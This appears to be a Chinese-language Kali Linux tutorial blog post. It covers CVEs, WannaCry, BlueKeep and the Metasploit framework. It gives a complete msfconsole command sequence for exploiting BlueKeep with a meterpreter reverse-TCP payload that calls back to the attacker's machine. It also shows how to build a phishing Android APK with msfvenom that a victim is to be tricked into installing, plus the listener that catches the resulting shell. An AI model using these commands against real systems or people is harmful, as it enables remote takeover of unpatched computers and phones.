Day29 - kali 0x4 Metasploit

前言

• 昨天提完破密工具之後，今天来讲讲这个exploit整合包

CVE (Common Vulnerabilities and Exposures)

• 通用漏洞披漏 (常见弱点和漏洞)
• 一个与资讯安全有关的资料库，收集各种资安弱点及漏洞并给予编号以便於公众查阅

Rule

• CVE - YYYY - NNNN
• CVE - (西元分) - (流水号)

Wannacry (CVE-2017-0143~0148)

• 内容: 利用 windows 漏洞 (MS17-010) 永恒之蓝
• 影响范围: windows 7 版本之前
• 受感染的电脑会有大量档案被加密，并且要求高价彼特币赎金

BlueKeep (CVE-2019-0708)

• https://www.ithome.com.tw/news/133987
• 受影响用户
  • windows7/server2008~2013
• 遭害者风险会遭远端执行任意程序码的风险 (RCE)
• 利用远端桌面连线协定连上系统，传送恶意呼叫
• 详细资讯

Metasploit

• 接着我们提提今天重头戏Metasploit，他整合了部分CVE的exploit，让使用者可以透过简单的指令打出漏洞

What is Metasploit?

• 一个免费、开源的渗透测试框架
• 由 H.D.Moore 於 2003 年发布
• 使用 Ruby 语言编写，目前是世界上最大的渗透测试资料库
• Github : https://github.com/rapid7/metasploit-framework
• website : https://www.metasploit.com/

基本用法

• 启动: msfconsole
• 查询漏洞: search <漏洞名称>
• 选择漏洞: use <漏洞档案>

使用方式(以 CVE 2019-0708 做举例)

汇入exploit

• 可在exploit-db上面找exploit汇入到Metasploit中
  • 

新版的kali已经预设就有这个exploit了，不须汇入

找 exploit

• cve_2019_0708_bluekeep_rce.rb

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //选择exploit
show options //查看设定参数
set rhosts <target_ip> //设定被害者的ip
set GROOMSIZE 50 
set payload windows/x64/meterpreter/reverse_tcp //设定攻击payload
set lhost <your_ip>
// windows7 SP1 VBOX
set target 2
run //攻击脚本执行
//成功之後 shell 可进对方 cmd

Meterpreter

• 破解成功之後的後门程序
• 添加一个用户，隐藏一些东西，打开shell等等
• windows/Linux/Android...都有支援

打成功就可以拿到shell

配合meterpreter，就可以拿到shell

同场加映 - 制作钓鱼 APK

• msfvenom -p android/meterpreter/reverse_tcp
• LHOST=<your_ip> LPORT=<port> > <file>
• 然後就会在电脑生成apk，这时候拿给受害者装app，就可以拿到shell了

Android Reverse shell

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit

技术总结

• Kali 工具多到爆，有兴趣可以自行研究
• 常常关注 CVE，Metasploit 的最新动态
• 台湾有法律，好自为之